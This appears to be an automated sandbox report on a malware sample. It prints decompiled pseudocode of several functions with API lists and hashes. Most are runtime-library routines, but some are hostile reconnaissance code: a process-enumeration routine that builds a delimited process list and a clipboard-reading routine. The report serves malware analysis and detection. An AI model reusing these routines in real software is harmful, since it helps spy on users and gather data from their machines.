Associated: 00000018.00000002.449127072.000000000046F000.00000040.00000001.sdmp Download File

Similarity

API ID: Find$File$CloseFirstH_prologNextchar_traits
String ID:
API String ID: 3260228402-0
Opcode ID: cf17a0be5e6b74316f5ddd3691667a9610a750139eb323bfcb8cd89baa550357
Instruction ID: 3f7feca7001ac29e2efe6dfa4d48dadfc39b28ff3590cbdafeaa97567dc4b3d4
Opcode Fuzzy Hash: cf17a0be5e6b74316f5ddd3691667a9610a750139eb323bfcb8cd89baa550357
Instruction Fuzzy Hash: 5C915E329041099BCB15EB61CD919EE7379AF20348F10417FE906B71E2EF386B49DB99

Uniqueness

Uniqueness Score: -1.00%

Function 0044A890, Relevance: 7.7, APIs: 5, Instructions: 188
COMMON

Download Yara Rule

C-Code - Quality: 89%

			E0044A890(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, signed int _a4, short* _a8, short* _a12) {
				signed int _v8;
				int _v12;
				int _v16;
				char _v20;
				signed int* _v24;
				short* _v28;
				void* __ebp;
				signed int _t39;
				void* _t45;
				signed int* _t46;
				signed int _t47;
				short* _t48;
				int _t49;
				short* _t56;
				short* _t57;
				short* _t58;
				int _t66;
				int _t68;
				short* _t72;
				intOrPtr _t75;
				void* _t77;
				short* _t78;
				intOrPtr _t85;
				short* _t89;
				short* _t92;
				void* _t94;
				short** _t102;
				short* _t103;
				signed int _t105;
				signed short _t108;
				signed int _t109;
				void* _t110;

				_t39 =  *0x46a00c; // 0x1e1e4200
				_v8 = _t39 ^ _t109;
				_t89 = _a12;
				_t105 = _a4;
				_v28 = _a8;
				_v24 = L00441CE2(_t89, __ecx, __edx) + 0x50;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t45 = L00441CE2(_t89, __ecx, __edx);
				_t99 = 0;
				 *((intOrPtr*)(_t45 + 0x34c)) =  &_v20;
				_t92 = _t105 + 0x80;
				_t46 = _v24;
				 *_t46 = _t105;
				_t102 =  &(_t46[1]);
				 *_t102 = _t92;
				if(_t92 != 0 &&  *_t92 != 0) {
					_t85 =  *0x459fa4; // 0x17
					E0044A833(0, 0x459e90, _t85 - 1, _t102);
					_t46 = _v24;
					_t110 = _t110 + 0xc;
					_t99 = 0;
				}
				_v20 = _t99;
				_t47 =  *_t46;
				if(_t47 == 0 ||  *_t47 == _t99) {
					_t48 =  *_t102;
					__eflags = _t48;
					if(_t48 == 0) {
						L19:
						_v20 = 0x104;
						_t49 = GetUserDefaultLCID();
						_v12 = _t49;
						_v16 = _t49;
						goto L20;
					}
					__eflags =  *_t48 - _t99;
					if( *_t48 == _t99) {
						goto L19;
					}
					E0044A1D0(_t92, _t99,  &_v20);
					_pop(_t92);
					goto L20;
				} else {
					_t72 =  *_t102;
					if(_t72 == 0 ||  *_t72 == _t99) {
						E0044A2B6(_t92, _t99,  &_v20);
					} else {
						E0044A21B(_t92, _t99,  &_v20);
					}
					_pop(_t92);
					if(_v20 != 0) {
						_t103 = 0;
						__eflags = 0;
						goto L25;
					} else {
						_t75 =  *0x459e8c; // 0x41
						_t77 = E0044A833(_t99, 0x459b80, _t75 - 1, _v24);
						_t110 = _t110 + 0xc;
						if(_t77 == 0) {
							L20:
							_t103 = 0;
							__eflags = 0;
							L21:
							if(_v20 != 0) {
								L25:
								asm("sbb esi, esi");
								_t108 = E0044A6BC(_t92,  ~_t105 & _t105 + 0x00000100,  &_v20);
								_pop(_t94);
								__eflags = _t108;
								if(_t108 == 0) {
									goto L22;
								}
								__eflags = _t108 - 0xfde8;
								if(_t108 == 0xfde8) {
									goto L22;
								}
								__eflags = _t108 - 0xfde9;
								if(_t108 == 0xfde9) {
									goto L22;
								}
								_t56 = IsValidCodePage(_t108 & 0x0000ffff);
								__eflags = _t56;
								if(_t56 == 0) {
									goto L22;
								}
								_t57 = IsValidLocale(_v16, 1);
								__eflags = _t57;
								if(_t57 == 0) {
									goto L22;
								}
								_t58 = _v28;
								__eflags = _t58;
								if(__eflags != 0) {
									 *_t58 = _t108;
								}
								E00442616(_t89, _t94, _t99, _t103, _t108, __eflags, _v16,  &(_v24[0x94]), 0x55, _t103);
								__eflags = _t89;
								if(__eflags == 0) {
									L36:
									L23:
									return L0042FD1B(_v8 ^ _t109);
								}
								_t33 =  &(_t89[0x90]); // 0x43e3e1
								E00442616(_t89, _t94, _t99, _t103, _t108, __eflags, _v16, _t33, 0x55, _t103);
								_t66 = GetLocaleInfoW(_v16, 0x1001, _t89, 0x40);
								__eflags = _t66;
								if(_t66 == 0) {
									goto L22;
								}
								_t36 =  &(_t89[0x40]); // 0x43e341
								_t68 = GetLocaleInfoW(_v12, 0x1002, _t36, 0x40);
								__eflags = _t68;
								if(_t68 == 0) {
									goto L22;
								}
								_t38 =  &(_t89[0x80]); // 0x43e3c1
								E0043BB3C(_t38, _t108, _t38, 0x10, 0xa);
								goto L36;
							}
							L22:
							goto L23;
						}
						_t78 =  *_t102;
						_t103 = 0;
						if(_t78 == 0 ||  *_t78 == 0) {
							E0044A2B6(_t92, _t99,  &_v20);
						} else {
							E0044A21B(_t92, _t99,  &_v20);
						}
						_pop(_t92);
						goto L21;
					}
				}
			}

0x0044a898
0x0044a89f
0x0044a8a6
0x0044a8aa
0x0044a8ae
0x0044a8bc
0x0044a8c1
0x0044a8c2
0x0044a8c3
0x0044a8c4
0x0044a8cc
0x0044a8ce
0x0044a8d4
0x0044a8da
0x0044a8dd
0x0044a8df
0x0044a8e2
0x0044a8e6
0x0044a8ed
0x0044a8fa
0x0044a8ff
0x0044a902
0x0044a905
0x0044a905
0x0044a907
0x0044a90a
0x0044a90e
0x0044a97e
0x0044a980
0x0044a982
0x0044a995
0x0044a995
0x0044a99c
0x0044a9a2
0x0044a9a5
0x00000000
0x0044a9a5
0x0044a984
0x0044a987
0x00000000
0x00000000
0x0044a98d
0x0044a992
0x00000000
0x0044a915
0x0044a915
0x0044a919
0x0044a92f
0x0044a920
0x0044a924
0x0044a924
0x0044a938
0x0044a939
0x0044a9c3
0x0044a9c3
0x00000000
0x0044a93f
0x0044a93f
0x0044a94e
0x0044a953
0x0044a958
0x0044a9a8
0x0044a9a8
0x0044a9a8
0x0044a9aa
0x0044a9ae
0x0044a9c5
0x0044a9d1
0x0044a9db
0x0044a9de
0x0044a9df
0x0044a9e1
0x00000000
0x00000000
0x0044a9e3
0x0044a9e9
0x00000000
0x00000000
0x0044a9eb
0x0044a9f1
0x00000000
0x00000000
0x0044a9f7
0x0044a9fd
0x0044a9ff
0x00000000
0x00000000
0x0044aa06
0x0044aa0c
0x0044aa0e
0x00000000
0x00000000
0x0044aa10
0x0044aa13
0x0044aa15
0x0044aa17
0x0044aa17
0x0044aa28
0x0044aa2d
0x0044aa2f
0x0044aa8f
0x0044a9b2
0x0044a9c2
0x0044a9c2
0x0044aa34
0x0044aa3e
0x0044aa4e
0x0044aa54
0x0044aa56
0x00000000
0x00000000
0x0044aa5e
0x0044aa6d
0x0044aa73
0x0044aa75
0x00000000
0x00000000
0x0044aa7f
0x0044aa87
0x00000000
0x0044aa8c
0x0044a9b0
0x00000000
0x0044a9b0
0x0044a95a
0x0044a95c
0x0044a960
0x0044a976
0x0044a967
0x0044a96b
0x0044a96b
0x0044a97b
0x00000000
0x0044a97b
0x0044a939

APIs

Part of subcall function 00441CE2: GetLastError.KERNEL32(?,00000000,0043B8C2,?,004170CE,-0046DD44,?,?,?,?,?,0040AEF2,.vbs), ref: 00441CE6
Part of subcall function 00441CE2: _free.LIBCMT ref: 00441D19
Part of subcall function 00441CE2: SetLastError.KERNEL32(00000000,?,004170CE,-0046DD44,?,?,?,?,?,0040AEF2,.vbs), ref: 00441D5A
Part of subcall function 00441CE2: _abort.LIBCMT ref: 00441D60

Part of subcall function 00441CE2: _free.LIBCMT ref: 00441D41
Part of subcall function 00441CE2: SetLastError.KERNEL32(00000000,?,004170CE,-0046DD44,?,?,?,?,?,0040AEF2,.vbs), ref: 00441D4E

GetUserDefaultLCID.KERNEL32(?,?,?), ref: 0044A99C
IsValidCodePage.KERNEL32(00000000), ref: 0044A9F7
IsValidLocale.KERNEL32(?,00000001), ref: 0044AA06
GetLocaleInfoW.KERNEL32(?,00001001,0043E2C1,00000040,?,0043E3E1,00000055,00000000,?,?,00000055,00000000), ref: 0044AA4E
GetLocaleInfoW.KERNEL32(?,00001002,0043E341,00000040), ref: 0044AA6D

Memory Dump Source

Source File: 00000018.00000002.448878959.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000018.00000002.449127072.000000000046F000.00000040.00000001.sdmp Download File

Similarity

API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
String ID:
API String ID: 745075371-0
Opcode ID: ee551fdf1c3de97742cd8df79b3566f25b0096286ea1fed63c8c741eae7e60fe
Instruction ID: 9b105efebd2c88567e68d059c0bbbfc36751d73e0e30cf1546c616c965cf3a16
Opcode Fuzzy Hash: ee551fdf1c3de97742cd8df79b3566f25b0096286ea1fed63c8c741eae7e60fe
Instruction Fuzzy Hash: CC5181B1940205ABFB10DFA5CC45ABF73B8BF08701F15486BE900E7291D7789914CB6A

Uniqueness

Uniqueness Score: -1.00%

Function 0040D211, Relevance: 6.1, APIs: 4, Instructions: 127
processCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040D211(void* __ebx, void* __ecx, void* __eflags) {
				char _v28;
				char _v52;
				char _v76;
				char _v100;
				char _v124;
				char _v148;
				char _v172;
				char _v196;
				char _v220;
				char _v244;
				char _v268;
				char _v292;
				char _v316;
				char _v340;
				char _v864;
				intOrPtr _v892;
				void* _v900;
				void* __edi;
				void* __esi;
				void* _t47;
				void* _t48;
				void* _t50;
				void* _t129;
				void* _t130;

				_t77 = __ecx;
				_t76 = __ebx;
				_t129 = __ecx;
				E004020D5(__ebx, __ecx);
				 *0x46beb4 = E00417614(_t77);
				_t130 = CreateToolhelp32Snapshot(2, 0);
				if(_t130 != 0) {
					_v900 = 0x22c;
					Process32FirstW(_t130,  &_v900);
					while(Process32NextW(_t130,  &_v900) != 0) {
						E0040427F(_t76,  &_v28,  &_v864);
						_t47 = E00417226(_t76,  &_v340, E00417642(_v892) & 0x000000ff);
						_t48 = E00417226(_t76,  &_v316, _v892);
						_t50 = E0041739C(_t76,  &_v268, E00417678( &_v292, _v892));
						E00401FD1(_t129, _t58, _t130, E00405343(_t76,  &_v52, L00402F1D( &_v76, E00405343(_t76,  &_v100, L00402F1D( &_v124, E00405343(_t76,  &_v148, L00402F1D( &_v172, E00405343(_t76,  &_v196, E004074F0(_t76,  &_v220, _t129, __eflags, E0041739C(_t76,  &_v244,  &_v28)), _t129, __eflags, 0x46061c), _t50), _t129, __eflags, 0x46061c), _t48), _t129, __eflags, 0x46061c), _t47), _t129, __eflags, "|"));
						E00401FC7();
						E00401FC7();
						E00401FC7();
						E00401FC7();
						E00401FC7();
						E00401FC7();
						E00401FC7();
						E00401FC7();
						E00401FC7();
						E00401FC7();
						L00401EF0();
						E00401FC7();
						E00401FC7();
						L00401EF0();
					}
					CloseHandle(_t130);
				}
				return _t129;
			}

0x0040d211
0x0040d211
0x0040d21c
0x0040d21e
0x0040d22c
0x0040d237
0x0040d23b
0x0040d247
0x0040d253
0x0040d3d2
0x0040d268
0x0040d286
0x0040d29d
0x0040d2c1
0x0040d342
0x0040d34a
0x0040d352
0x0040d35a
0x0040d362
0x0040d36d
0x0040d378
0x0040d383
0x0040d38e
0x0040d399
0x0040d3a4
0x0040d3af
0x0040d3ba
0x0040d3c5
0x0040d3cd
0x0040d3cd
0x0040d3e9
0x0040d3e9
0x0040d3f6

APIs

Part of subcall function 00417614: GetCurrentProcess.KERNEL32(?,?,?,004180D1,WinDir,00000000,00000000), ref: 00417625
Part of subcall function 00417614: IsWow64Process.KERNEL32(00000000,?,?,004180D1,WinDir,00000000,00000000), ref: 0041762C

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040D231
Process32FirstW.KERNEL32(00000000,?), ref: 0040D253
Process32NextW.KERNEL32(00000000,0000022C), ref: 0040D3DA
CloseHandle.KERNEL32(00000000), ref: 0040D3E9

Memory Dump Source

Source File: 00000018.00000002.448878959.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000018.00000002.449127072.000000000046F000.00000040.00000001.sdmp Download File

Similarity

API ID: ProcessProcess32$CloseCreateCurrentFirstHandleNextSnapshotToolhelp32Wow64
String ID:
API String ID: 715332099-0
Opcode ID: 7e8eb5756563c21674be2b42cde96e66368aaa04c1e238b3ed61a6e384962dca
Instruction ID: 43f38b1539949543322e8b732d0e6a0d6251ec8b58a184f5b0d342f80c8325cc
Opcode Fuzzy Hash: 7e8eb5756563c21674be2b42cde96e66368aaa04c1e238b3ed61a6e384962dca
Instruction Fuzzy Hash: CD415D319142198BCB15FB66DC51AEEB375AF50304F1001BEB40AB61E2EF786F89DE58

Uniqueness

Uniqueness Score: -1.00%

Function 0044A343, Relevance: 4.7, APIs: 3, Instructions: 205
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E0044A343(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, intOrPtr _a4) {
				signed int _v8;
				short _v248;
				signed int _v252;
				intOrPtr _v256;
				void* __ebp;
				signed int _t50;
				signed int _t58;
				signed int _t67;
				signed int _t69;
				signed int _t72;
				signed int _t73;
				intOrPtr _t75;
				signed int _t76;
				signed int _t84;
				signed int _t86;
				signed int _t87;
				signed int _t89;
				intOrPtr _t90;
				void* _t92;
				intOrPtr* _t113;
				void* _t117;
				intOrPtr* _t119;
				signed int _t123;
				signed int _t124;
				signed int _t125;
				signed int _t126;
				void* _t127;
				signed int* _t129;
				int _t132;
				signed int _t133;
				void* _t134;

				_t50 =  *0x46a00c; // 0x1e1e4200
				_v8 = _t50 ^ _t133;
				_t92 = L00441CE2(__ebx, __ecx, __edx);
				_t129 =  *(L00441CE2(_t92, __ecx, __edx) + 0x34c);
				_t132 = E0044A66B(_a4);
				asm("sbb ecx, ecx");
				if(GetLocaleInfoW(_t132, ( ~( *(_t92 + 0x64)) & 0xfffff005) + 0x1002,  &_v248, 0x78) != 0) {
					_t58 = L0044CF51(_t92, _t129, _t132,  *((intOrPtr*)(_t92 + 0x54)),  &_v248);
					_v252 = _v252 & 0x00000000;
					__eflags = _t58;
					if(_t58 != 0) {
						L18:
						__eflags = ( *_t129 & 0x00000300) - 0x300;
						if(( *_t129 & 0x00000300) == 0x300) {
							L39:
							__eflags =  !( *_t129 >> 2) & 0x00000001;
							L40:
							return L0042FD1B(_v8 ^ _t133);
						}
						asm("sbb ecx, ecx");
						_t67 = GetLocaleInfoW(_t132, ( ~( *(_t92 + 0x60)) & 0xfffff002) + 0x1001,  &_v248, 0x78);
						__eflags = _t67;
						if(_t67 != 0) {
							_t69 = L0044CF51(_t92, _t129, _t132,  *((intOrPtr*)(_t92 + 0x50)),  &_v248);
							__eflags = _t69;
							if(_t69 != 0) {
								__eflags =  *(_t92 + 0x60);
								if( *(_t92 + 0x60) != 0) {
									goto L39;
								}
								__eflags =  *(_t92 + 0x5c);
								if( *(_t92 + 0x5c) == 0) {
									goto L39;
								}
								_t72 = L0044CF51(_t92, _t129, _t132,  *((intOrPtr*)(_t92 + 0x50)),  &_v248);
								__eflags = _t72;
								if(_t72 != 0) {
									goto L39;
								}
								_push(_t129);
								_t73 = E0044A7C3(0, _t132, 0);
								__eflags = _t73;
								if(_t73 == 0) {
									goto L39;
								}
								 *_t129 =  *_t129 | 0x00000100;
								__eflags = _t129[1];
								L37:
								if(__eflags == 0) {
									_t129[1] = _t132;
								}
								goto L39;
							}
							 *_t129 =  *_t129 | 0x00000200;
							_t123 =  *_t129;
							__eflags =  *(_t92 + 0x60) - _t69;
							if( *(_t92 + 0x60) == _t69) {
								__eflags =  *(_t92 + 0x5c) - _t69;
								if( *(_t92 + 0x5c) == _t69) {
									goto L23;
								}
								_t113 =  *((intOrPtr*)(_t92 + 0x50));
								_v256 = _t113 + 2;
								do {
									_t75 =  *_t113;
									_t113 = _t113 + 2;
									__eflags = _t75 - _v252;
								} while (_t75 != _v252);
								__eflags = _t113 - _v256 >> 1 -  *(_t92 + 0x5c);
								if(_t113 - _v256 >> 1 !=  *(_t92 + 0x5c)) {
									_t69 = 0;
									goto L23;
								}
								_push(_t129);
								_t76 = E0044A7C3(_t92, _t132, 1);
								__eflags = _t76;
								if(_t76 == 0) {
									goto L39;
								}
								 *_t129 =  *_t129 | 0x00000100;
								_t69 = 0;
								L24:
								__eflags = _t129[1] - _t69;
								goto L37;
							}
							L23:
							_t124 = _t123 | 0x00000100;
							__eflags = _t124;
							 *_t129 = _t124;
							goto L24;
						}
						 *_t129 = _t67;
						L2:
						goto L40;
					}
					asm("sbb eax, eax");
					_t84 = GetLocaleInfoW(_t132, ( ~( *(_t92 + 0x60)) & 0xfffff002) + 0x1001,  &_v248, 0x78);
					__eflags = _t84;
					if(_t84 == 0) {
						goto L1;
					}
					_t86 = L0044CF51(_t92, _t129, _t132,  *((intOrPtr*)(_t92 + 0x50)),  &_v248);
					_pop(_t117);
					__eflags = _t86;
					if(_t86 != 0) {
						__eflags =  *_t129 & 0x00000002;
						if(( *_t129 & 0x00000002) != 0) {
							goto L18;
						}
						__eflags =  *(_t92 + 0x5c);
						if( *(_t92 + 0x5c) == 0) {
							L14:
							_t125 =  *_t129;
							__eflags = _t125 & 0x00000001;
							if((_t125 & 0x00000001) != 0) {
								goto L18;
							}
							_t87 = E0044A79F(_t132);
							__eflags = _t87;
							if(_t87 == 0) {
								goto L18;
							}
							_t126 = _t125 | 0x00000001;
							__eflags = _t126;
							 *_t129 = _t126;
							goto L17;
						}
						_t89 = E0043B6DE(_t92, _t117, _t132,  *((intOrPtr*)(_t92 + 0x50)),  &_v248,  *(_t92 + 0x5c));
						_t134 = _t134 + 0xc;
						__eflags = _t89;
						if(_t89 != 0) {
							goto L14;
						}
						 *_t129 =  *_t129 | 0x00000002;
						__eflags =  *_t129;
						_t129[2] = _t132;
						_t119 =  *((intOrPtr*)(_t92 + 0x50));
						_t127 = _t119 + 2;
						do {
							_t90 =  *_t119;
							_t119 = _t119 + 2;
							__eflags = _t90 - _v252;
						} while (_t90 != _v252);
						__eflags = _t119 - _t127 >> 1 -  *(_t92 + 0x5c);
						if(_t119 - _t127 >> 1 ==  *(_t92 + 0x5c)) {
							_t129[1] = _t132;
						}
					} else {
						 *_t129 =  *_t129 | 0x00000304;
						_t129[1] = _t132;
						L17:
						_t129[2] = _t132;
					}
					goto L18;
				}
				L1:
				 *_t129 =  *_t129 & 0x00000000;
				goto L2;
			}

0x0044a34e
0x0044a355
0x0044a363
0x0044a36b
0x0044a37a
0x0044a386
0x0044a39f
0x0044a3b6
0x0044a3bb
0x0044a3c4
0x0044a3c6
0x0044a479
0x0044a482
0x0044a484
0x0044a576
0x0044a57d
0x0044a580
0x0044a590
0x0044a590
0x0044a497
0x0044a4a8
0x0044a4ae
0x0044a4b0
0x0044a4c3
0x0044a4ca
0x0044a4cc
0x0044a538
0x0044a53b
0x00000000
0x00000000
0x0044a53d
0x0044a540
0x00000000
0x00000000
0x0044a54c
0x0044a553
0x0044a555
0x00000000
0x00000000
0x0044a557
0x0044a55c
0x0044a564
0x0044a566
0x00000000
0x00000000
0x0044a568
0x0044a56e
0x0044a571
0x0044a571
0x0044a573
0x0044a573
0x00000000
0x0044a571
0x0044a4ce
0x0044a4d4
0x0044a4d6
0x0044a4d9
0x0044a4eb
0x0044a4ee
0x00000000
0x00000000
0x0044a4f0
0x0044a4f6
0x0044a4fc
0x0044a4fc
0x0044a4ff
0x0044a502
0x0044a502
0x0044a513
0x0044a516
0x0044a532
0x00000000
0x0044a532
0x0044a518
0x0044a51c
0x0044a524
0x0044a526
0x00000000
0x00000000
0x0044a528
0x0044a52e
0x0044a4e3
0x0044a4e3
0x00000000
0x0044a4e3
0x0044a4db
0x0044a4db
0x0044a4db
0x0044a4e1
0x00000000
0x0044a4e1
0x0044a4b2
0x0044a3a4
0x00000000
0x0044a3a6
0x0044a3da
0x0044a3e8
0x0044a3ee
0x0044a3f0
0x00000000
0x00000000
0x0044a3fc
0x0044a402
0x0044a403
0x0044a405
0x0044a412
0x0044a415
0x00000000
0x00000000
0x0044a417
0x0044a41b
0x0044a45f
0x0044a45f
0x0044a461
0x0044a464
0x00000000
0x00000000
0x0044a467
0x0044a46d
0x0044a46f
0x00000000
0x00000000
0x0044a471
0x0044a471
0x0044a474
0x00000000
0x0044a474
0x0044a42a
0x0044a42f
0x0044a432
0x0044a434
0x00000000
0x00000000
0x0044a436
0x0044a436
0x0044a439
0x0044a43c
0x0044a43f
0x0044a442
0x0044a442
0x0044a445
0x0044a448
0x0044a448
0x0044a455
0x0044a458
0x0044a45a
0x0044a45a
0x0044a407
0x0044a407
0x0044a40d
0x0044a476
0x0044a476
0x0044a476
0x00000000
0x0044a405
0x0044a3a1
0x0044a3a1
0x00000000

APIs

Part of subcall function 00441CE2: GetLastError.KERNEL32(?,00000000,0043B8C2,?,004170CE,-0046DD44,?,?,?,?,?,0040AEF2,.vbs), ref: 00441CE6
Part of subcall function 00441CE2: _free.LIBCMT ref: 00441D19
Part of subcall function 00441CE2: SetLastError.KERNEL32(00000000,?,004170CE,-0046DD44,?,?,?,?,?,0040AEF2,.vbs), ref: 00441D5A
Part of subcall function 00441CE2: _abort.LIBCMT ref: 00441D60

Part of subcall function 00441CE2: _free.LIBCMT ref: 00441D41
Part of subcall function 00441CE2: SetLastError.KERNEL32(00000000,?,004170CE,-0046DD44,?,?,?,?,?,0040AEF2,.vbs), ref: 00441D4E

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0044A397
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0044A3E8
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0044A4A8

Memory Dump Source

Source File: 00000018.00000002.448878959.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000018.00000002.449127072.000000000046F000.00000040.00000001.sdmp Download File

Similarity

API ID: ErrorInfoLastLocale$_free$_abort
String ID:
API String ID: 2829624132-0
Opcode ID: b14c01951aef5a3ce9e700fe29605e893b340df90a5e0dffce6f4a8b69f02f7e
Instruction ID: b8f74ff5e519f84a9dadc1d099471af389f48447beb5eaa2b6f47629cec96164
Opcode Fuzzy Hash: b14c01951aef5a3ce9e700fe29605e893b340df90a5e0dffce6f4a8b69f02f7e
Instruction Fuzzy Hash: 8061C275980207ABFB289F25CD86B7A77A8EF04304F10807BE905C6681E77CDD61CB5A

Uniqueness

Uniqueness Score: -1.00%

Function 00436793, Relevance: 4.6, APIs: 3, Instructions: 78
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E00436793(intOrPtr __ebx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v0;
				signed int _v8;
				intOrPtr _v524;
				intOrPtr _v528;
				void* _v532;
				intOrPtr _v536;
				char _v540;
				intOrPtr _v544;
				intOrPtr _v548;
				intOrPtr _v552;
				intOrPtr _v556;
				intOrPtr _v560;
				intOrPtr _v564;
				intOrPtr _v568;
				intOrPtr _v572;
				intOrPtr _v576;
				intOrPtr _v580;
				intOrPtr _v584;
				char _v724;
				intOrPtr _v792;
				intOrPtr _v800;
				char _v804;
				struct _EXCEPTION_POINTERS _v812;
				signed int _t40;
				char* _t47;
				char* _t49;
				intOrPtr _t61;
				intOrPtr _t62;
				intOrPtr _t66;
				intOrPtr _t67;
				int _t68;
				intOrPtr _t69;
				signed int _t70;

				_t69 = __esi;
				_t67 = __edi;
				_t66 = __edx;
				_t61 = __ebx;
				_t40 =  *0x46a00c; // 0x1e1e4200
				_t41 = _t40 ^ _t70;
				_v8 = _t40 ^ _t70;
				if(_a4 != 0xffffffff) {
					_push(_a4);
					E0042F906(_t41);
					_pop(_t62);
				}
				L00431F00(_t67,  &_v804, 0, 0x50);
				L00431F00(_t67,  &_v724, 0, 0x2cc);
				_v812.ExceptionRecord =  &_v804;
				_t47 =  &_v724;
				_v812.ContextRecord = _t47;
				_v548 = _t47;
				_v552 = _t62;
				_v556 = _t66;
				_v560 = _t61;
				_v564 = _t69;
				_v568 = _t67;
				_v524 = ss;
				_v536 = cs;
				_v572 = ds;
				_v576 = es;
				_v580 = fs;
				_v584 = gs;
				asm("pushfd");
				_pop( *_t22);
				_v540 = _v0;
				_t49 =  &_v0;
				_v528 = _t49;
				_v724 = 0x10001;
				_v544 =  *((intOrPtr*)(_t49 - 4));
				_v804 = _a8;
				_v800 = _a12;
				_v792 = _v0;
				_t68 = IsDebuggerPresent();
				SetUnhandledExceptionFilter(0);
				if(UnhandledExceptionFilter( &_v812) == 0 && _t68 == 0 && _a4 != 0xffffffff) {
					_push(_a4);
					E0042F906(_t57);
				}
				return L0042FD1B(_v8 ^ _t70);
			}

0x00436793
0x00436793
0x00436793
0x00436793
0x0043679e
0x004367a3
0x004367a5
0x004367ad
0x004367af
0x004367b2
0x004367b7
0x004367b7
0x004367c3
0x004367d6
0x004367e4
0x004367ea
0x004367f0
0x004367f6
0x004367fc
0x00436802
0x00436808
0x0043680e
0x00436814
0x0043681a
0x00436821
0x00436828
0x0043682f
0x00436836
0x0043683d
0x00436844
0x00436845
0x0043684e
0x00436854
0x00436857
0x0043685d
0x0043686a
0x00436873
0x0043687c
0x00436885
0x00436893
0x00436895
0x004368aa
0x004368b6
0x004368b9
0x004368be
0x004368cd

APIs

IsDebuggerPresent.KERNEL32 ref: 0043688B
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00436895
UnhandledExceptionFilter.KERNEL32(?), ref: 004368A2

Memory Dump Source

Source File: 00000018.00000002.448878959.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000018.00000002.449127072.000000000046F000.00000040.00000001.sdmp Download File

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: 07253ee0852a9f33764ca5d3af73c4e3b9e3190da062120a25caf8a432b7ba1b
Instruction ID: 5d9ea4708ef0fa84a544dc6c90c967fa764ee4a1b9fa1f4ccea9e64d0f0b82c3
Opcode Fuzzy Hash: 07253ee0852a9f33764ca5d3af73c4e3b9e3190da062120a25caf8a432b7ba1b
Instruction Fuzzy Hash: 5B31D47490122DABCB21DF64DC8978DBBB8BF08351F5041EAE80CA7251EB749F858F49

Uniqueness

Uniqueness Score: -1.00%

Function 00409BD9, Relevance: 4.5, APIs: 3, Instructions: 22
clipboardCOMMON

Download Yara Rule

C-Code - Quality: 50%

			E00409BD9(intOrPtr _a4) {
				void* _t8;
				void* _t10;

				if(OpenClipboard(0) == 0) {
					L3:
					_push(0x45f724);
				} else {
					_t10 = GetClipboardData(0xd);
					CloseClipboard();
					if(_t10 == 0) {
						goto L3;
					} else {
						_push(_t10);
					}
				}
				E0040427F(_t8, _a4);
				return _a4;
			}

0x00409be7
0x00409c00
0x00409c00
0x00409be9
0x00409bf1
0x00409bf3
0x00409bfb
0x00000000
0x00409bfd
0x00409bfd
0x00409bfd
0x00409bfb
0x00409c08
0x00409c12

APIs

OpenClipboard.USER32(00000000), ref: 00409BDF
GetClipboardData.USER32 ref: 00409BEB
CloseClipboard.USER32 ref: 00409BF3

Memory Dump Source

Source File: 00000018.00000002.448878959.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000018.00000002.449127072.000000000046F000.00000040.00000001.sdmp Download File

Similarity

API ID: Clipboard$CloseDataOpen
String ID:
API String ID: 2058664381-0
Opcode ID: c9e41d73b8ee8baeafd22f2e569e48e40bbb3502372004424e024307334bc33d
Instruction ID: 8fe6b2826689424b7bc62c1d4e27f3d4ac42e80e4ec2c38984a05695e355c6dc
Opcode Fuzzy Hash: c9e41d73b8ee8baeafd22f2e569e48e40bbb3502372004424e024307334bc33d
Instruction Fuzzy Hash: 88E08631648314BBD610AFA1DC09F9A7B94AB44BD3F050036FD05AA2D2DB74DD00C6AD

Uniqueness

Uniqueness Score: -1.00%

Function 0043CB4E, Relevance: 4.5, APIs: 3, Instructions: 20
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0043CB4E(int _a4) {
				void* _t14;
				void* _t16;

				if(E00442796(_t14, _t16) != 0 && ( *( *[fs:0x30] + 0x68) >> 0x00000008 & 0x00000001) == 0) {
					TerminateProcess(GetCurrentProcess(), _a4);
				}
				E0043CB8F(_t14, _t16, _a4);
				ExitProcess(_a4);
			}

0x0043cb5a
0x0043cb76
0x0043cb76
0x0043cb7f
0x0043cb88

APIs

GetCurrentProcess.KERNEL32(00000003,?,0043CB24,00000003,00468188,0000000C,0043CC37,00000003,00000002,00000000,?,0043F98B,00000003), ref: 0043CB6F
TerminateProcess.KERNEL32(00000000,?,0043CB24,00000003,00468188,0000000C,0043CC37,00000003,00000002,00000000,?,0043F98B,00000003), ref: 0043CB76
ExitProcess.KERNEL32 ref: 0043CB88

Memory Dump Source

Source File: 00000018.00000002.448878959.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000018.00000002.449127072.000000000046F000.00000040.00000001.sdmp Download File

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 2ecbea2c07618ed559622067c22dc850304ef45ed073450550f7931f31c69ed4
Instruction ID: 9d9abcf2254aec220b88c5a41349a832f37ebcac6e9232ae025b4d2f02e95462
Opcode Fuzzy Hash: 2ecbea2c07618ed559622067c22dc850304ef45ed073450550f7931f31c69ed4
Instruction Fuzzy Hash: 56E0B631000748ABCF116F65ED4AA597F69FF59397F045069F9059A232CB39EE42CB48

Uniqueness

Uniqueness Score: -1.00%

